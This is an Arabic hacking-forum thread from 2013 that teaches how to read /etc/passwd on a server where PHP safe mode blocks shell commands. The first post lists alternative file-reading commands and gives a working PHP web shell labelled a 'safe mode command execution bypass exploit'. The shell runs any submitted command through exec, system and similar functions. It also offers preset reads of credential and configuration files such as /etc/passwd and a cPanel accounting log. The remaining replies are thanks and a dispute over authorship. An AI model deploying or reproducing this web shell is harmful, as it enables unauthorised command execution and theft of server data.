1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

تخطي امر استخراج حسابات الشل - cat /etc/passwd

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة W M V, بتاريخ ‏31 مارس 2013.

كاتب الموضوع : W M V المشاهدات : 352 الردود : 8 ‏31 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    W M V
    rank
    Developer

    عضو منذ:
    ‏6 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    [​IMG]

    أخواني المطورين في شبكة عراق تيم سلام الله عليكم



    اليوم درسنا تخطي امر استخراج حسابات الشل - cat /etc/passwd


    عندما تكون السيف مود مفعلة يمنع كتابة الأوامر i:q2^:


    طبعآ أكواد بسيطة نستطيع تخطي حماية السيرفر إلي عاملنا مشاكل i:q1^:



    [​IMG]
    الكود الأول اذا ماضبط معاك أستخدم الكود الثاني :{13}:


    الكود الأول :


    كود PHP:
    xxd /etc/passwd
    rev 
    /etc/passwd
    tac 
    /etc/passwd
    more 
    /etc/passwd
    less 
    /etc/passwd



    [​IMG]


    الكود الثاني اذا ماضبط معاك نستخدم سكربت برايفت


    كود PHP:
    <?php
    echo file_get_contents('/etc/passwd'); 
    ?>

    [​IMG]


    السكربت :


    كود PHP:
    <?

    function 
    safeshell($komut)
    {
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    $res '';
    if (!empty(
    $komut))
    {
    if(
    function_exists('exec'))
    {
    @
    exec($komut,$res);
    $res join("\n",$res);
    }
    elseif(
    function_exists('shell_exec'))
    {
    $res = @shell_exec($komut);
    }
    elseif(
    function_exists('system'))
    {
    @
    ob_start();
    @
    system($komut);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(
    function_exists('passthru'))
    {
    @
    ob_start();
    @
    passthru($komut);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(@
    is_resource($f = @popen($komut,"r")))
    {
    $res "";
    while(!@
    feof($f)) { $res .= @fread($f,1024); }
    @
    pclose($f);
    }
    }
    return 
    $res;
    }
    echo 
    "<b><font color=blue>Private Safe Mode Command Execution Bypass Exploit </font></b><br>";
    echo 
    "<b><font color=red>            | iq-team.org | W M V</font></b><br>";
    print_r('
    <pre>
    <form method="POST" action="">
    <b><fontcolor=blue> c0mmand  :</font></b><input name="baba" type="text"><input  value="Extract" type="submit">
    </form>
    <form method="POST" action="">
    <b><font color=blue>sELECT Pleas :=) :</font><select size="1" name="liz0">
    <option value="cat /etc/passwd">/etc/passwd</option>
    <option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
    <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
    <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
    <option value="cat /etc/hosts">/etc/hosts</option>
    <option value="cat /etc/named.conf">/etc/named.conf</option>
    <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
    </select> <input type="submit" value="Extract">
    </form>
    </pre>
    '
    );
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if(
    $_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
    if(
    $_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
    $uid=safeshell('id');
    $server=safeshell('uname -a');
    echo 
    "<pre><h4>";
    echo 
    "<b><font color=red>User:=)</font></b>:$uid<br>";
    echo 
    "<b><font color=red>Server</font></b>:$server<br>";
    echo 
    "<b><font color=red>C0mmands extracted:</font></b><br>";
    if(
    $_POST["baba"]!= "") { echo $liz0; }
    if(
    $_POST["liz0"]!= "") { echo $liz0zim; }
    echo 
    "</h4></pre>";
    ?>

    [​IMG]


    أتمنى أني وفقت في طرحي واتمنى انو ما يكون فيه تقصير ، وفقني الله وإياكم جميعاً &:": ​
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    MMA_LORD_735
    rank
    Developer

    عضو منذ:
    ‏5 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    وعليكم السلام
    لاهنت وعساك ع القوة
    )5:"
     


  4. غير متصل

    احمد العراقي
    ExpErt DeveloPer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    الله ينور ياغالي
    موضوع مميز :{8}:​
     


  5. غير متصل

    القناص
    DeveloPer Plus

    عضو منذ:
    ‏8 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    وعليكم السلام ورحمة الله وبركاته
    الله يعطيك العافية ياحبيبي

    واصل أبداعك !:"​
     


  6. غير متصل

    ملـك بدون مملكه
    DeveloPer Plus

    عضو منذ:
    ‏11 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    جزاك الله الف خير اخوي :{2}:
     


  7. غير متصل

    Mr.HaWQaL
    rank
    Developer

    عضو منذ:
    ‏31 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    السلام عليكم
    ربي يهديك أخي صاحب الموضوع
    هذا الموضوع أنا صاحبه و أنا الذي كتبته و تعبت من أجله تعدل فيه و تقول أنو لك
    الموضوع هذا وضعته في منتديين فقط ديزاد رووت و الحماية للأبد
    + السكربت أنا إلي معدل فيه و كاتب فيه حقوقي تغيرها لحقوقك شو ها التزييف
    لو أنك وضعت الموضوع كامل بدون تحريف لكنت قبلت ذلك لكن أنك تغير الحقوق تنسبها لك مو سهلة حبيبي الغالي
    هذا فقط ما يتميز به العرب التحريف فقط
    حسبنا الله و نعم الوكيل
     


  8. غير متصل

    The-Worm
    rankrank
    Active DeveloPer

    عضو منذ:
    ‏10 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    السلآم عليكم ورحمة الله وبركاته
    يعطيك ألف عافية أخي موضوع مميز
    موفق اخي &:"​
     


  9. غير متصل

    Yousef <link href="http://www.iq-team.org/vb/ghost/ghost.
    DeveloPer Plus

    عضو منذ:
    ‏1 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    عليكم السلام اخي اذا كان في انتهاك للحقوق يمكن استخدام خاصية التبليغ [​IMG]


    الاداره ماتقصر معاك &:"​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...